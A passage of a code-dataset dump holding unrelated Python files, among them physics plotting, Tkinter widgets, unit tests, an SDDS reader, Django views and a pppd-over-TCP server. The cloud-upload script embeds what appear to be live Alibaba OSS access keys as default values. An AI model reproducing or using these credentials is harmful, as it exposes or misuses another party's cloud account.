(V0*V0*math.sin(2*a*pi/180))/g\nCZAS_UPADEK = 2*V0*math.sin(a*pi/180)/g\n\nt = np.arange(0, CZAS_UPADEK, 0.2)\nx = np.arange(0, CZAS_UPADEK, 0.2)\nVX = V0*math.cos(a*math.pi/180)*(t-t+1) # VX constant\nVY = V0*math.sin(a*math.pi/180)-g*t\nz= x*math.tan(a*math.pi/180)\nm= (g*np.square(x))/(2*np.square(VX))\ntor = z-m\nd = V0*math.cos(a*math.pi/180)*t\nf = V0*math.sin(a*math.pi/180)*t-g*np.square(t)/2\nc = np.sqrt(np.square(d)+np.square(f))\n\nprint(\"\\nWysokość maksymalna to: \"+str(MAX_HEIGHT)+\"m\")\n#print(ZASIEG)\nprint(\"Zasięg wynosi: \"+str(ZASIEG2)+\"m\")\nprint(\"Czas lotu wynosi: \"+str(CZAS_UPADEK)+\"s\\n\")\n\n\nplt.subplot(311)\nplt.plot([t], [VX], 'rs')\nplt.plot([t], [VY], 'bo')\nplt.axis([0, CZAS_UPADEK,0,VY[0]])\nplt.xlabel('Czas t(sekundy)')\nplt.ylabel('Prędkość VX/VY (m/s)')\n\nplt.subplot(312)\nplt.plot([t],[c], 'rs')\nplt.xlabel('Czas t(sekundy)')\nplt.ylabel('Odległość od [0,0]')\n\nplt.subplot(313)\nplt.plot([x], [tor], 'rs')\nplt.xlabel('odległość x')\nplt.ylabel('wysokość y')\n\nplt.show()","sub_path":"lista9/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"299743258","text":"'''\r\nCreated on 22-Jul-2015\r\n\r\n@author: Selvam\r\n'''\r\n\r\nfrom Tkinter import *\r\n\r\nroot = Tk()\r\nroot.title('CheckButton')\r\n#root.geometry(\"250x150\")\r\n\r\nvar = IntVar()\r\nvar1 = IntVar()\r\nCheckbutton(root, text=\"Button1\", variable=var, selectcolor='skyblue').pack()\r\nCheckbutton(root, text=\"Button2\", variable=var1).pack()\r\nButton(root, text='OK', command=root.destroy).pack()\r\n\r\nlb = Listbox(root, selectmode=EXTENDED)\r\n\r\nfor item in [\"one\", \"two\", \"three\", \"four\"]:\r\n lb.insert(END, item)\r\nlb.pack()\r\n\r\nm1 = Message(root, text=\"Hi\")\r\nm1.pack()\r\n\r\nt1 = Text(root)\r\nt1.insert(END, \"Text\")\r\nt1.config(relief=FLAT, bg='blue', height=1, width=4, state=DISABLED)\r\nt1.pack()\r\n\r\nmainloop()","sub_path":"TkinterCode/checkbutton1.py","file_name":"checkbutton1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"117636815","text":"import unittest\n\nfrom mock import patch\nimport numpy as np\n\nfrom models.LightPulse import LightPulse\nfrom hardware.MeasurementHandler import MeasurementHandler\nfrom models.ExperimentSettings import ExperimentSettings\n\nfrom testfixtures import log_capture\n\n\n@patch(\"hardware.MeasurementHandler.WaveformThread\", autospec=True)\nclass MeasurementHandlerTest(unittest.TestCase):\n # np.set_printoptions(threshold='nan')\n def setUp(self):\n self.settings = ExperimentSettings()\n\n self.lp = LightPulse(self.settings)\n\n def test__run_thread(self, mock_waveform_thread):\n\n mock_waveform_thread.return_value.time = 3\n mock_waveform_thread.return_value.Read_Data = np.array([])\n\n handler = MeasurementHandler()\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n # handler._run_thread()\n\n def test_single_measurement_no_averaging(self, mock_waveform_thread):\n\n handler = MeasurementHandler()\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n return_tuple = (np.array([1, 2, 3, 4, 5, 6]), np.array([0, 1]))\n\n with patch.object(handler, '_run_thread',\n return_value=return_tuple) as method:\n test_dataset = handler.single_measurement()\n self.assertEqual(1, method.call_count)\n np.testing.assert_array_equal(\n test_dataset,\n np.array([[0, 1, 3, 5], [1, 2, 4, 6]])\n )\n\n 
self.assertEqual(len(handler._queue), 0)\n\n def test_single_measurement_with_averaging(self, mock_waveform_thread):\n # setup\n settings = ExperimentSettings()\n settings.averaging = 2\n handler = MeasurementHandler()\n return_tuple = [\n (np.array([2, 3, 4, 5, 6, 7]), np.array([0, 1])),\n (np.array([3, 4, 5, 6, 7, 8]), np.array([0, 1])),\n ]\n\n handler.add_to_queue(self.lp.create_waveform(), settings)\n\n with patch.object(handler, '_run_thread', side_effect=return_tuple) as method:\n # perform\n test_dataset = handler.single_measurement()\n\n # assert\n self.assertEqual(2, method.call_count)\n np.testing.assert_array_equal(\n test_dataset,\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n )\n\n self.assertEqual(len(handler._queue), 0)\n\n\n def test_add_to_queue(self, mock_waveform_thread):\n handler = MeasurementHandler()\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n self.assertEqual(len(handler._queue), 1)\n\n @log_capture()\n def test_series_measurement_empty_queue(self, mock_waveform_thread,\n log_checker):\n\n handler = MeasurementHandler()\n\n observed_data_list = handler.series_measurement()\n self.assertEqual(\n len(observed_data_list), 0)\n\n log_checker.check(\n ('root', 'INFO', 'Total: 0 measurements performed'),\n )\n\n @log_capture()\n def test_series_measurement_one_in_queue(self, mock_waveform_thread,\n log_checker):\n\n # setup\n handler = MeasurementHandler()\n print(handler._queue)\n\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n side_effect_array = [\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n ]\n\n with patch.object(handler, 'single_measurement',\n side_effect=side_effect_array) as method:\n # perform\n observed_data_list = handler.series_measurement()\n\n # assert\n for observed_data in observed_data_list:\n np.testing.assert_array_equal(\n observed_data,\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n )\n\n log_checker.check(\n ('root', 'INFO', 'Measurement #1 complete'),\n ('root', 'INFO', 'Total: 1 measurements performed'),\n )\n\n @log_capture()\n def test_series_measurement_multiple_queue(self, mock_waveform_thread,\n log_checker):\n\n side_effect_array = [\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]]),\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]]),\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n ]\n\n handler = MeasurementHandler()\n\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n\n with patch.object(handler, 'single_measurement',\n side_effect=side_effect_array) as method:\n observed_data_list = handler.series_measurement()\n\n for observed_data in observed_data_list:\n np.testing.assert_array_equal(\n observed_data,\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n )\n log_checker.check(\n ('root', 'INFO', 'Measurement #1 complete'),\n ('root', 'INFO', 'Measurement #2 complete'),\n ('root', 'INFO', 'Measurement #3 complete'),\n ('root', 'INFO', 'Total: 3 measurements performed'),\n )\n","sub_path":"pvapp/test/test_measurement_handler.py","file_name":"test_measurement_handler.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598300221","text":"# -*- coding: utf-8 -*-\r\nimport base64\r\nj =str.encode(\"[11]:data:image/png;base64,\")\r\ni = r'Snipaste_2021-06-28_17-21-49.png'\r\nf=open(i,'rb') 
# open the image file in binary mode\r\nls_f=base64.b64encode(f.read()) # read the file contents and convert them to base64\r\nf.close()\r\nwith open('E:/脚本/bs4_png.txt','wb') as e:\r\n e.write(j)\r\n e.write(ls_f)\r\n ","sub_path":"png.py","file_name":"png.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"296157437","text":"# -*- coding: utf-8 -*-\nimport base64\nimport os\nimport re\n\nimport oss2\n\n# First initialize the AccessKeyId, AccessKeySecret, Endpoint and related settings.\n# Read them from environment variables, or replace placeholders such as \"<your AccessKeyId>\" with the real values.\naccess_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', 'LTAI4FkXV5WzzQiVx6Jj8Lna')\naccess_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', '2iw8aulSCNJovwpLIMQ8VM8JUk8Uci')\nbucket_name = os.getenv('OSS_TEST_BUCKET', 'ynd-picture')\nendpoint = os.getenv('OSS_TEST_ENDPOINT', 'oss-cn-beijing.aliyuncs.com')\n\n# Make sure the parameters above are all filled in correctly\nfor param in (access_key_id, access_key_secret, bucket_name, endpoint):\n assert '<' not in param, 'Please set the parameter: ' + param\n\n# Create the Bucket object; every Object-related API call goes through it\nbucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)\n\n\n# Upload a user avatar; username = the login user name, img is a base64-encoded string\ndef userfile_upload(username, img):\n # convert to an image\n a = re.search(r'data:.+base64,', img)\n img = img.replace(a.group(), \"\")\n userimg = base64.b64decode(img)\n # the first argument is the name the uploaded file is stored under, the second is the uploaded image\n res = bucket.put_object(username + '.jpg', userimg)\n if res.status == 200:\n url = \"https://ynd-picture.oss-cn-beijing.aliyuncs.com/\" + username + '.jpg'\n # return the URL of the user's avatar\n return url\n else:\n return False\n\n\n# Delete a user avatar; username = the login user name\ndef delete_userimg(username):\n bucket.delete_object(username + '.jpg')\n return \"Avatar deleted successfully\"\n\n","sub_path":"common/userimg_upload.py","file_name":"userimg_upload.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"104322605","text":"from __future__ import annotations\n\nfrom typing import NamedTuple\n\nfrom settings import DEFAULT_PREFIX\n\n\nclass Command(NamedTuple):\n name: str\n raw_args: str\n args: list[str]\n\n @classmethod\n def from_str(cls, s: str, prefix: str = DEFAULT_PREFIX) -> 'Command':\n if not s.startswith(prefix):\n raise ValueError\n stripped = s.removeprefix(prefix)\n cmd_name, *raw_args = [part.strip() for part in stripped.split(' ', maxsplit=1)]\n _, *args = [part.strip() for part in stripped.split()]\n\n return Command(\n name=cmd_name,\n raw_args=''.join(raw_args),\n args=args,\n )\n\n @classmethod\n def dummy(cls) -> 'Command':\n return Command(\n name='привет',\n raw_args='',\n args=[],\n )\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"515861365","text":"#!/usr/bin/env python3\n\nimport os, sys, time, subprocess, pty, fcntl, socket, select, argparse;\n\nparser = argparse.ArgumentParser();\nparser.add_argument(\n '--host',\n '-H',\n help='Specify binding host for the PPP server.',\n default=''\n);\nparser.add_argument(\n '--port',\n '-P',\n help='Specify port for the PPP server.',\n type=int,\n default=23\n);\nparser.add_argument('pppd_options', nargs=argparse.REMAINDER, help='Options for pppd');\nargs = parser.parse_args();\n\nclass Terminal:\n __closed=False;\n def __init__(self):\n global args;\n self.__master, self.__slave = pty.openpty();\n fcntl.fcntl(self.__master, fcntl.F_SETFL, fcntl.fcntl(self.__master, fcntl.F_GETFL) | 
os.O_NONBLOCK);\n ptyPath=\"/proc/\"+str(os.getpid())+'/fd/'+str(self.__slave);\n subprocess.Popen(['/usr/sbin/pppd', ptyPath]+args.pppd_options);\n\n def close(self):\n if self.__closed:\n return;\n os.close(self.__slave);\n os.close(self.__master);\n self.__closed=True;\n\n def read(self):\n try:\n return os.read(self.__master, 65536);\n except BlockingIOError:\n return b'';\n\n def write(self, data):\n os.write(self.__master, data);\n\ninputs = [];\noutputs = [];\nterms = {};\ntry:\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM);\n server.setblocking(0);\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);\n server.bind((args.host, args.port));\n server.listen(5);\n inputs.append(server);\nexcept OSError as e:\n print(str(e));\n exit(1);\n\ndef closeConnection(socket):\n global inputs,outputs,terms;\n fileno=str(socket.fileno());\n if socket in inputs:\n inputs.remove(socket);\n if socket in outputs:\n outputs.remove(socket);\n if fileno in terms:\n terms.pop(fileno).close();\n socket.close();\n\ntry:\n while True:\n time.sleep(0.1);\n readable, writable, exceptional = select.select(inputs, outputs, inputs);\n for s in readable:\n if s is server:\n conn, addr = s.accept();\n conn.setblocking(0);\n inputs.append(conn);\n terms[str(conn.fileno())] = Terminal();\n else:\n try:\n terms[str(s.fileno())].write(s.recv(1024));\n if s not in outputs:\n outputs.append(s);\n except Exception as e:\n print(e);\n closeConnection(s);\n\n for s in writable:\n try:\n s.sendall(terms[str(s.fileno())].read());\n if s in outputs:\n outputs.remove(s);\n except Exception as e:\n print(e);\n closeConnection(s);\n\n for s in exceptional:\n closeConnection(s);\n\nexcept KeyboardInterrupt:\n pass;\nfinally:\n for key, term in terms.items():\n term.close();\n\n","sub_path":"misc/pppd.py","file_name":"pppd.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"61955024","text":"from django.template import RequestContext\nfrom django.shortcuts import render_to_response, render\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound\nfrom showParser.show import parser\n\nimport os, json\nimport showParser.forms as forms\n\nUSERNAME = os.environ['NETFLIX_USER']\nPASSWORD = os.environ['NETFLIX_PASS']\n\ndef index(request):\n\treturn render_to_response('index.html')\t\n\ndef add(request):\n\twith open('assets/showdata.json', 'r') as text_file:\n\t\tshows_data = json.load(text_file)\n\tshows = shows_data.keys()\n\tshows_list = '
<ul>'\n\tfor i in range(len(shows)):\n\t\tshows_list += ('<li>
' + shows[i] + '
</li>')\n\tshows_list += '</ul>
'\n\tif request.method == \"POST\":\n\t\tshow_form = forms.SPModelForm(request.POST)\n\t\tif 'add_show' in request.POST:\n\t\t\talert_bar = ''\n\t\t\tshow_form = forms.SPModelForm(request.POST)\n\t\t\tif show_form.is_valid():\n\t\t\t\tshowName = show_form.cleaned_data['show'] \n\t\t\t\tif showName not in shows:\n\t\t\t\t\tshow = parser(USERNAME, PASSWORD, showName)\n\t\t\t\t\texists = show.getSeasonLink()\n\t\t\t\t\tif exists:\n\t\t\t\t\t\tshow.getEpisodeLinks()\n\t\t\t\t\t\tshows_data[showName] = show.showContent\n\t\t\t\t\t\tnew_data = json.dumps(shows_data)\n\t\t\t\t\t\twith open('assets/showdata.json', 'w') as text_file:\n\t\t\t\t\t\t\ttext_file.write(new_data)\n\t\t\t\t\t\talert_bar += \"\"\"\n\t\t\t\t\t\t\t
<div class=\"alert alert-success\">\n\t\t\t\t\t\t\t\tShow Added! To watch a random show, please click on the \"Watch\" button!\n\t\t\t\t\t\t\t</div>
\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn render(request, 'add.html', {'form': show_form, 'alert_bar': alert_bar, 'shows_list': shows_list})\n\t\t\t\t\telse:\n\t\t\t\t\t\talert_bar += \"\"\"\n\t\t\t\t\t\t\t
<div class=\"alert alert-danger\">\n\t\t\t\t\t\t\t\tShow Doesn't Exist! Please make sure to type in the show exactly as it appears on Netflix! Otherwise it cannot be added.\n\t\t\t\t\t\t\t</div>
\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn render(request, 'add.html', {'form': show_form, 'alert_bar': alert_bar, 'shows_list': shows_list})\n\n\t\t\t\telse:\n\t\t\t\t\talert_bar += \"\"\"\n\t\t\t\t\t\t
<div class=\"alert alert-warning\">\n\t\t\t\t\t\t\tShow Already Exists! \"%s\" is already in the database. Just go select it from the \"Watch\" tab!\n\t\t\t\t\t\t</div>
\n\t\t\t\t\t\"\"\" % (showName)\n\t\t\t\t\treturn render(request, 'add.html', {'form': show_form, 'alert_bar': alert_bar, 'shows_list': shows_list})\n\n\t\t\telse:\n\t\t\t\treturn error\n\t\telse:\n\t\t\tpass\n\telse:\n\t\tshow_form = forms.SPModelForm()\n\t\tresponse = render(request, 'add.html', {'form': show_form, 'alert_bar': '', 'shows_list': shows_list})\n\t\treturn response\n\ndef watch(request):\n\twith open('assets/showdata.json', 'r') as text_file:\n\t\tnetflixdata = text_file.read()\n\twith open('assets/showdata.json', 'r') as text_file:\n\t\tshowdata = json.load(text_file)\n\n\tif len(showdata.keys()) != 0:\n\t\tdropdownList = showdata.keys()\n\n\t\tshowsList = \"\"\n\t\tfor i in dropdownList:\n\t\t\tshowsList += '
<li><a href=\"%s\">%s</a></li>' % (i, i)\n\n\t\tresponse = render(request, 'watch.html', {'showsList': showsList, 'proof': netflixdata})\n\t\treturn response\n\telse:\n\t\talert_bar = \"\"\"\n\t\t\t
<div class=\"alert alert-info\">\n\t\t\t\tThere aren't any shows! You have no shows included in your file. Go add some!\n\t\t\t</div>
    \n\t\t\"\"\"\n\t\treturn render(request, 'watch.html', {'alert_bar': alert_bar})\n\n\n\treturn render_to_response('watch.html')\n\ndef contact(request):\n\treturn render_to_response('contact.html')","sub_path":"showParser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285776983","text":"\"\"\"empty message\n\nRevision ID: aebca35c48ef\nRevises: 76359437b051\nCreate Date: 2019-12-28 16:41:57.942334\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'aebca35c48ef'\ndown_revision = '76359437b051'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('culture_reference',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('modified', sa.DateTime(), nullable=True),\n sa.Column('reference_fk', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['reference_fk'], ['reference.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('event_reference',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('modified', sa.DateTime(), nullable=True),\n sa.Column('reference_fk', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['reference_fk'], ['reference.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('event_reference')\n op.drop_table('culture_reference')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/aebca35c48ef_.py","file_name":"aebca35c48ef_.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"571125803","text":"# abs(Ai - (b - i )) + ... のmin\nN = int(input())\nA = list(map(int,input().split()))\nB = []\nfor i in range(len(A)):\n B.append(A[i] - (i + 1))\nB.sort()\n#print(B)\nif N % 2 == 1:\n b = B[N//2]\nelse:\n b = (B[N // 2] + B[N // 2 - 1]) // 2\n#print(b)\nsum_val = 0\nfor i in range(N):\n sum_val += abs(B[i] - b)\nprint(sum_val)","sub_path":"ABC/102/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261983343","text":"class Solution(object):\n\n def container_with_most_water(self, heights):\n \"\"\"\n :param heights: List[int]\n :return: int\n \"\"\"\n left_pt = 0\n right_pt = len(heights)-1\n area = 0\n\n while left_pt < right_pt:\n min_height = min(heights[left_pt], heights[right_pt])\n area = max(area, min_height*(right_pt-left_pt))\n if heights[left_pt] < heights[right_pt]:\n left_pt += 1\n else:\n right_pt -= 1\n\n return area\n","sub_path":"all_problems/11. 
Container With Most Water/container_with_most_water.py","file_name":"container_with_most_water.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"126435373","text":"\"\"\"\nReader\n------\n\nThis module contains the reading functionality of ``sdds``.\nIt provides a high-level function to read SDDS files in different formats, and a series of helpers.\n\"\"\"\nimport pathlib\nimport struct\nimport sys\nfrom typing import IO, Any, List, Optional, Generator, Dict, Union, Tuple, Callable, Type\n\nimport numpy as np\n\nfrom sdds.classes import (SddsFile, Column, Parameter, Definition, Array, Data, Description,\n ENCODING, NUMTYPES_CAST, NUMTYPES_SIZES, get_dtype_str)\n\n\ndef read_sdds(file_path: Union[pathlib.Path, str], endianness: str = None) -> SddsFile:\n \"\"\"\n Reads SDDS file from the specified ``file_path``.\n\n Args:\n file_path (Union[pathlib.Path, str]): `Path` object to the input SDDS file. Can be a\n `string`, in which case it will be cast to a `Path` object.\n endianness (str): Endianness of the file. Either 'big' or 'little'.\n If not given, the endianness is either extracted from\n the comments in the header of the file (if present)\n or determined by the machine you are running on.\n Binary files written by this package are all big-endian,\n and contain a comment in the file.\n\n Returns:\n An `SddsFile` object containing the loaded data.\n \"\"\"\n file_path = pathlib.Path(file_path)\n with file_path.open(\"rb\") as inbytes:\n if endianness is None:\n endianness = _get_endianness(inbytes)\n version, definition_list, description, data = _read_header(inbytes)\n data_list = _read_data(data, definition_list, inbytes, endianness)\n\n return SddsFile(version, description, definition_list, data_list)\n\n\n##############################################################################\n# Common reading of header and data.\n##############################################################################\n\ndef _read_header(inbytes: IO[bytes]) -> Tuple[str, List[Definition], Optional[Description], Data]:\n word_gen = _gen_words(inbytes)\n version = next(word_gen) # First token is the SDDS version\n assert version == \"SDDS1\",\\\n \"This module is compatible with SDDS v1 only... 
are there really other versions?\"\n definitions: List[Definition] = []\n description: Optional[Description] = None\n data: Optional[Data] = None\n for word in word_gen:\n def_dict: Dict[str, str] = _get_def_as_dict(word_gen)\n if word in (Column.TAG, Parameter.TAG, Array.TAG):\n definitions.append({\n Column.TAG: Column,\n Parameter.TAG: Parameter,\n Array.TAG: Array}[word](name=def_dict.pop(\"name\"),\n type=def_dict.pop(\"type\"),\n **def_dict))\n continue\n if word == Description.TAG:\n if description is not None:\n raise ValueError(\"Two &description tags found.\")\n description = Description(**def_dict)\n continue\n if word == \"&include\":\n # TODO: This should be easy but I will not support it for now.\n raise NotImplementedError\n if word == Data.TAG:\n data = Data(mode=def_dict.pop(\"mode\"))\n break\n raise ValueError(f\"Unknown token: {word} encountered.\")\n if data is None:\n raise ValueError(\"Found end of file while looking for &data tag.\")\n definitions = _sort_definitions(definitions)\n return version, definitions, description, data\n\n\ndef _sort_definitions(orig_defs: List[Definition]) -> List[Definition]:\n \"\"\"\n Sorts the definitions in the parameter, array, column order.\n According to the specification, parameters appear first in data pages then arrays\n and then columns. Inside each group they follow the order of appearance in the header.\n \"\"\"\n definitions: List[Definition] = [definition for definition in orig_defs\n if isinstance(definition, Parameter)]\n definitions.extend([definition for definition in orig_defs if isinstance(definition, Array)])\n definitions.extend([definition for definition in orig_defs if isinstance(definition, Column)])\n return definitions\n\n\ndef _read_data(data: Data, definitions: List[Definition], inbytes: IO[bytes], endianness: str) -> List[Any]:\n if data.mode == \"binary\":\n return _read_data_binary(definitions, inbytes, endianness)\n elif data.mode == \"ascii\":\n return _read_data_ascii(definitions, inbytes)\n\n raise ValueError(f\"Unsupported data mode {data.mode}.\")\n\n\n##############################################################################\n# Binary data reading\n##############################################################################\n\ndef _read_data_binary(definitions: List[Definition], inbytes: IO[bytes], endianness: str) -> List[Any]:\n row_count: int = _read_bin_int(inbytes, endianness) # First int in bin data\n functs_dict: Dict[Type[Definition], Callable] = {\n Parameter: _read_bin_param,\n Column: lambda x, y, z: _read_bin_column(x, y, z, row_count),\n Array: _read_bin_array\n }\n return [functs_dict[definition.__class__](inbytes, definition, endianness) for definition in definitions]\n\n\ndef _read_bin_param(inbytes: IO[bytes], definition: Parameter, endianness: str) -> Union[int, float, str]:\n try:\n if definition.fixed_value is not None:\n if definition.type == \"string\":\n return definition.fixed_value\n return NUMTYPES_CAST[definition.type](definition.fixed_value)\n except AttributeError:\n pass\n if definition.type == \"string\":\n str_len: int = _read_bin_int(inbytes, endianness)\n return _read_string(inbytes, str_len, endianness)\n return NUMTYPES_CAST[definition.type](\n _read_bin_numeric(inbytes, definition.type, 1, endianness)\n )\n\n\ndef _read_bin_column(inbytes: IO[bytes], definition: Column, endianness: str, row_count: int):\n # TODO: This columns things might be interesting to implement.\n raise NotImplementedError(\"\")\n\n\ndef _read_bin_array(inbytes: IO[bytes], definition: 
Array, endianness: str) -> Any:\n dims, total_len = _read_bin_array_len(inbytes, definition.dimensions, endianness)\n\n if definition.type == \"string\":\n len_type = {\"u1\": \"char\", \"i2\": \"short\"}.get(\n getattr(definition, \"modifier\", None), \"long\"\n )\n str_array = []\n for _ in range(total_len):\n str_len = int(_read_bin_numeric(inbytes, len_type, 1, endianness))\n str_array.append(_read_string(inbytes, str_len, endianness))\n return str_array\n\n data = _read_bin_numeric(inbytes, definition.type, total_len, endianness)\n return data.reshape(dims)\n\n\ndef _read_bin_array_len(inbytes: IO[bytes], num_dims: Optional[int], endianness: str) -> Tuple[List[int], int]:\n if num_dims is None:\n num_dims = 1\n\n dims = [_read_bin_int(inbytes, endianness) for _ in range(num_dims)]\n return dims, int(np.prod(dims))\n\n\ndef _read_bin_numeric(inbytes: IO[bytes], type_: str, count: int, endianness: str) -> Any:\n return np.frombuffer(inbytes.read(count * NUMTYPES_SIZES[type_]),\n dtype=np.dtype(get_dtype_str(type_, endianness)))\n\n\ndef _read_bin_int(inbytes: IO[bytes], endianness: str) -> int:\n return int(_read_bin_numeric(inbytes, \"long\", 1, endianness))\n\n\ndef _read_string(inbytes: IO[bytes], str_len: int, endianness: str) -> str:\n str_dtype = get_dtype_str(\"string\", endianness, length=str_len)\n packed_str = inbytes.read(str_len)\n return struct.unpack(str_dtype, packed_str)[0].decode(ENCODING)\n\n\n##############################################################################\n# ASCII data reading\n##############################################################################\n\ndef _read_data_ascii(definitions: List[Definition], inbytes: IO[bytes]) -> List[Any]:\n def _ascii_generator(ascii_text):\n for line in ascii_text:\n yield line\n\n # Convert bytes to ASCII, separate by lines and remove comments\n ascii_text = [chr(r) for r in inbytes.read()]\n ascii_text = ''.join(ascii_text).split('\\n')\n ascii_text = [line for line in ascii_text if not line.startswith('!')]\n\n # Get the generator for the text\n ascii_gen = _ascii_generator(ascii_text)\n\n # Dict of function to call for each type of tag: array, parameter\n functs_dict = {Parameter: _read_ascii_parameter,\n Array: _read_ascii_array\n }\n\n # Iterate through every parameters and arrays in the file\n data = []\n for definition in definitions:\n def_tag = definition.__class__\n\n # Call the function handling the tag we're on\n # Change the current line according to the tag and dimensions\n value = functs_dict[def_tag](ascii_gen, definition)\n data.append(value)\n\n return data\n\n\ndef _read_ascii_parameter(ascii_gen: Generator[str, None, None],\n definition: Parameter) -> Union[str, int, float]:\n\n # Check if we got fixed values, no need to read a line if that's the case\n if definition.fixed_value is not None:\n if definition.type == \"string\":\n return definition.fixed_value\n if definition.type in NUMTYPES_CAST:\n return NUMTYPES_CAST[definition.type](definition.fixed_value)\n\n # No fixed value -> read a line\n # Strings can be returned without cast\n if definition.type == \"string\":\n return next(ascii_gen)\n\n # For other types, a cast is needed\n if definition.type in NUMTYPES_CAST:\n return NUMTYPES_CAST[definition.type](next(ascii_gen))\n\n raise TypeError(f\"Type {definition.type} for Parameter unsupported\")\n\n\ndef _read_ascii_array(ascii_gen: Generator[str, None, None],\n definition: Array) -> np.ndarray:\n\n # Get the number of elements per dimension\n dimensions = next(ascii_gen).split()\n 
dimensions = np.array(dimensions, dtype=\"int\")\n\n # Get all the data given by the dimensions\n data = []\n while len(data) != np.prod(dimensions):\n # The values on each line are split by a space\n data += next(ascii_gen).strip().split(' ')\n\n # Cast every object to the correct type\n if definition.type != 'string':\n data = list(map(NUMTYPES_CAST[definition.type], data))\n\n # Convert to np.array so that it can be reshaped to reflect the dimensions\n data = np.array(data)\n data = data.reshape(dimensions)\n\n return data\n\n\n##############################################################################\n# Helper generators to consume the input bytes\n##############################################################################\n\ndef _get_endianness(inbytes: IO[bytes]) -> str:\n \"\"\"Tries to determine endianness from file-comments.\n If nothing found, uses machine endianness.\"\"\"\n endianness = sys.byteorder\n while True:\n line = inbytes.readline().decode(ENCODING)\n if not line:\n break # break at beginning of binary part\n if line.strip() == \"!# big-endian\":\n endianness = \"big\"\n break\n if line.strip() == \"!# little-endian\":\n endianness = \"little\"\n break\n inbytes.seek(0) # return back to beginning of file\n return endianness\n\n\ndef _gen_real_lines(inbytes: IO[bytes]) -> Generator[str, None, None]:\n \"\"\"No comments and stripped lines.\"\"\"\n while True:\n line = inbytes.readline().decode(ENCODING)\n if not line:\n return\n if line != \"\\n\" and not line.strip().startswith(\"!\"):\n yield line.strip()\n\n\ndef _gen_words(inbytes: IO[bytes]) -> Generator[str, None, None]:\n for line in _gen_real_lines(inbytes):\n for word in line.split():\n yield word\n return\n\n\ndef _get_def_as_dict(word_gen: Generator[str, None, None]) -> Dict[str, str]:\n raw_str: List[str] = []\n for word in word_gen:\n if word.strip() == \"&end\":\n recomposed: str = \" \".join(raw_str)\n parts = [assign for assign in recomposed.split(\",\") if assign]\n return {key.strip(): value.strip() for (key, value) in\n [assign.split(\"=\") for assign in parts]}\n raw_str.append(word.strip())\n raise ValueError(\"EOF found while looking for &end tag.\")\n","sub_path":"sdds/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":12389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"248786951","text":"# ms_mint/helpers.py\n\nimport os\n\ndef dataframe_difference(df1, df2, which=None):\n \"\"\"Find rows which are different between two DataFrames.\"\"\"\n 